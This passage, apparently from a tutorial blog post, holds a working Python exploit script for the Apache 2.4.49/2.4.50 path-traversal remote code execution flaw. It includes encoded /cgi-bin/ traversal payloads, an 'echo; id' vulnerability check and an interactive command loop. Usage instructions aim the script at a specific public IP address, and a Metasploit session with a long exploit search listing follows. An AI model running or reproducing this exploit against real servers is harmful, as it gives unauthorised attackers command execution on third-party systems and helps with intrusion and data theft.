&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;mute_command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;command&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;session&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Session&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;POST&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;echo; &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;command&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;prepare&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;url&lt;/span&gt;  
    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;session&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;exploitRCE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Session&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;host&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;http&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;http://&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;host&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;host&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt; 
        &lt;span class="n"&gt;session&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Session&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;command&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;echo; id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
        &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;POST&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;command&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;prepare&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;url&lt;/span&gt;  
        &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;session&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;uid&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;choice&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Y&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GREEN&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;[!] Target %s is vulnerable !!!&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;[!] Sortie:&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;YELLOW&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;choice&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;input&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;CYAN&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;[?] Do you want to exploit this RCE ? (Y/n) : &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;choice&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;lower&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;''&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;y&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;yes&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
                &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                    &lt;span class="nf"&gt;commands&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;command&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;session&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  
            &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;       
        &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;RED&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Target %s isn&lt;/span&gt;&lt;span class="se"&gt;\'&lt;/span&gt;&lt;span class="s"&gt;t vulnerable&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;KeyboardInterrupt&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;apache2449_payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;
        &lt;span class="n"&gt;apache2450_payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;
        &lt;span class="n"&gt;payloads&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;apache2449_payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;apache2450_payload&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="n"&gt;choice&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payloads&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;header&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\033&lt;/span&gt;&lt;span class="s"&gt;[1;37m[0] Apache 2.4.49 RCE&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;[1] Apache 2.4.50 RCE&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="n"&gt;choice&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payloads&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;choice&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;choice&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;input&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;[~] Choice : &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;choice&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payloads&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="nf"&gt;exploitRCE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payloads&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;choice&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;KeyboardInterrupt&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n\033&lt;/span&gt;&lt;span class="s"&gt;[1;91m[!] Bye bye !&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;time&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;0.5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h2&gt;
  
  
  Let's to run file
&lt;/h2&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python3 Explot.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Use: &lt;code&gt;python3 file.py ip:port&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python3 Explot.py 145.14.145.161:80
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Use metasploit to exploit
&lt;/h2&gt;




&lt;p&gt;run &lt;code&gt;msfconsole&lt;/code&gt; in your terminal&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;msfconsole
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;      .:okOOOkdc&lt;span class="s1"&gt;'           '&lt;/span&gt;cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  &lt;span class="s1"&gt;'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'&lt;/span&gt;
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         &lt;span class="p"&gt;;&lt;/span&gt;d&lt;span class="p"&gt;;&lt;/span&gt;         ,OOOOOOOOl
  .OOOOOOOO.   .&lt;span class="p"&gt;;&lt;/span&gt;           &lt;span class="p"&gt;;&lt;/span&gt;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     &lt;span class="s1"&gt;'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'&lt;/span&gt;   .OOOO.   :OOOO.   &lt;span class="p"&gt;;&lt;/span&gt;OOOO&lt;span class="p"&gt;;&lt;/span&gt;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk&lt;span class="p"&gt;;&lt;/span&gt;.OOOOOOOOOOOOO.cOk:
             &lt;span class="p"&gt;;&lt;/span&gt;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      &lt;span class="nb"&gt;.&lt;/span&gt;

       &lt;span class="o"&gt;=[&lt;/span&gt; metasploit v6.3.5-dev                           &lt;span class="o"&gt;]&lt;/span&gt;
+ &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;=[&lt;/span&gt; 2296 exploits - 1202 auxiliary - 410 post       &lt;span class="o"&gt;]&lt;/span&gt;
+ &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;=[&lt;/span&gt; 962 payloads - 45 encoders - 11 nops            &lt;span class="o"&gt;]&lt;/span&gt;
+ &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;=[&lt;/span&gt; 9 evasion                                       &lt;span class="o"&gt;]&lt;/span&gt;

Metasploit tip: Save the current environment with the 
save &lt;span class="nb"&gt;command&lt;/span&gt;, future console restarts will use this 
environment again
Metasploit Documentation: https://docs.metasploit.com/

msf6 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; search exploit
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Matching Modules
&lt;span class="o"&gt;================&lt;/span&gt;

   &lt;span class="c"&gt;#     Name                                                                               Disclosure Date  Rank       Check  Description&lt;/span&gt;
   -     &lt;span class="nt"&gt;----&lt;/span&gt;                                                                               &lt;span class="nt"&gt;---------------&lt;/span&gt;  &lt;span class="nt"&gt;----&lt;/span&gt;       &lt;span class="nt"&gt;-----&lt;/span&gt;  &lt;span class="nt"&gt;-----------&lt;/span&gt;
   0     auxiliary/dos/http/cable_haunt_websocket_dos                                       2020-01-07       normal     No     &lt;span class="s2"&gt;"Cablehaunt"&lt;/span&gt; Cable Modem WebSocket DoS
   1     exploit/windows/ftp/32bitftp_list_reply                                            2010-10-12       good       No     32bit FTP Client Stack Buffer Overflow
   2     exploit/windows/tftp/threectftpsvc_long_mode                                       2006-11-27       great      No     3CTftpSvc TFTP Long Mode Buffer Overflow
   3     exploit/windows/ftp/3cdaemon_ftp_user                                              2005-01-04       average    Yes    3Com 3CDaemon 2.0 FTP Username Overflow
   4     exploit/windows/scada/igss9_misc                                                   2011-03-24       excellent  No     7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
   5     exploit/windows/scada/igss9_igssdataserver_rename                                  2011-03-24       normal     No     7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
   6     exploit/windows/scada/igss9_igssdataserver_listall                                 2011-03-24       good       No     7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow
   7     exploit/windows/fileformat/a_pdf_wav_to_mp3                                        2010-08-17       normal     No     A-PDF WAV to MP3 v1.0.0 Buffer Overflow
   8     auxiliary/scanner/http/a10networks_ax_directory_traversal                          2014-01-28       normal     No     A10 Networks AX Loadbalancer Directory Traversal
   9     exploit/windows/ftp/aasync_list_reply                                              2010-10-12       good       No     AASync v2.2.1.0 &lt;span class="o"&gt;(&lt;/span&gt;Win32&lt;span class="o"&gt;)&lt;/span&gt; Stack Buffer Overflow &lt;span class="o"&gt;(&lt;/span&gt;LIST&lt;span class="o"&gt;)&lt;/span&gt;
   10    exploit/windows/scada/abb_wserver_exec                                             2013-04-05       excellent  Yes    ABB MicroSCADA wserver.exe Remote Code Execution
   11    exploit/windows/fileformat/abbs_amp_lst                                            2013-06-30       normal     No     ABBS Audio Media Player .LST Buffer Overflow
   12    exploit/linux/local/abrt_raceabrt_priv_esc                                         2015-04-14       excellent  Yes    ABRT raceabrt Privilege Escalation
   13    exploit/linux/local/abrt_sosreport_priv_esc                                        2015-11-23       excellent  Yes    ABRT sosreport Privilege Escalation
   14    exploit/windows/fileformat/acdsee_fotoslate_string                                 2011-09-12       good       No     ACDSee FotoSlate PLP File &lt;span class="nb"&gt;id &lt;/span&gt;Parameter Overflow
   15    exploit/windows/fileformat/acdsee_xpm                                              2007-11-23       good       No     ACDSee XPM File Section Buffer Overflow
   16    exploit/linux/local/af_packet_chocobo_root_priv_esc                                2016-08-12       good       Yes    AF_PACKET chocobo_root Privilege Escalation
   17    exploit/linux/local/af_packet_packet_set_ring_priv_esc                             2017-03-29       good       Yes    AF_PACKET packet_set_ring Privilege Escalation
   18    exploit/windows/sip/aim_triton_cseq                                                2006-07-10       great      No     AIM Triton 1.0.4 CSeq Buffer Overflow
   19    exploit/windows/misc/ais_esel_server_rce                                           2019-03-27       excellent  Yes    AIS logistics ESEL-Server Unauth SQL Injection RCE
   20    exploit/aix/rpc_cmsd_opcode21                                                      2009-10-07       great      No     AIX Calendar Manager Service Daemon &lt;span class="o"&gt;(&lt;/span&gt;rpc.cmsd&lt;span class="o"&gt;)&lt;/span&gt; Opcode 21 Buffer Overflow
   21    exploit/windows/misc/allmediaserver_bof                                            2012-07-04       normal     No     ALLMediaServer 0.8 Buffer Overflow
   22    exploit/windows/fileformat/allplayer_m3u_bof                                       2013-10-09       normal     No     ALLPlayer M3U Buffer Overflow
   23    exploit/windows/fileformat/aol_phobos_bof                                          2010-01-20       average    No     AOL 9.5 Phobos.Playlist Import&lt;span class="o"&gt;()&lt;/span&gt; Stack-based Buffer Overflow
   24    exploit/windows/fileformat/aol_desktop_linktag                                     2011-01-31       normal     No     AOL Desktop 9.6 RTX Buffer Overflow
   25    exploit/windows/browser/aim_goaway                                                 2004-08-09       great      No     AOL Instant Messenger goaway Overflow
   26    exploit/windows/browser/aol_ampx_convertfile                                       2009-05-19       normal     No     AOL Radio AmpX ActiveX Control ConvertFile&lt;span class="o"&gt;()&lt;/span&gt; Buffer Overflow
   27    exploit/linux/local/apt_package_manager_persistence                                1999-03-09       excellent  No     APT Package Manager Persistence
   28    exploit/windows/browser/asus_net4switch_ipswcom                                    2012-02-17       normal     No     ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow
   29    exploit/linux/misc/asus_infosvr_auth_bypass_exec                                   2015-01-04       excellent  No     ASUS infosvr Auth Bypass Command Execution
   30    exploit/linux/http/atutor_filemanager_traversal                                    2016-03-01       excellent  Yes    ATutor 2.2.1 Directory Traversal / Remote Code Execution
   31    exploit/multi/http/atutor_sqli                                                     2016-03-01       excellent  Yes    ATutor 2.2.1 SQL Injection / Remote Code Execution
   32    exploit/multi/http/atutor_upload_traversal                                         2019-05-17       excellent  Yes    ATutor 2.2.4 - Directory Traversal / Remote Code Execution,
   33    exploit/unix/webapp/awstatstotals_multisort                                        2008-08-26       excellent  Yes    AWStats Totals multisort Remote Command Execution
   34    exploit/unix/webapp/awstats_configdir_exec                                         2005-01-15       excellent  Yes    AWStats configdir Remote Command Execution
   35    exploit/unix/webapp/awstats_migrate_exec   
   &lt;span class="nb"&gt;.&lt;/span&gt;
   &lt;span class="nb"&gt;.&lt;/span&gt;
   &lt;span class="nb"&gt;.&lt;/span&gt;
   &lt;span class="nb"&gt;.&lt;/span&gt;
   &lt;span class="nb"&gt;.&lt;/span&gt;
   &lt;span class="nb"&gt;.&lt;/span&gt;
   &lt;span class="nb"&gt;.&lt;/span&gt;
   &lt;span class="nb"&gt;.&lt;/span&gt;
   &lt;span class="nb"&gt;.&lt;/span&gt;
   &lt;span class="nb"&gt;.&lt;/span&gt;
   &lt;span class="nb"&gt;.&lt;/span&gt;
     2454  exploit/windows/http/edirectory_imonitor                                           2005-08-11       great      No     eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow
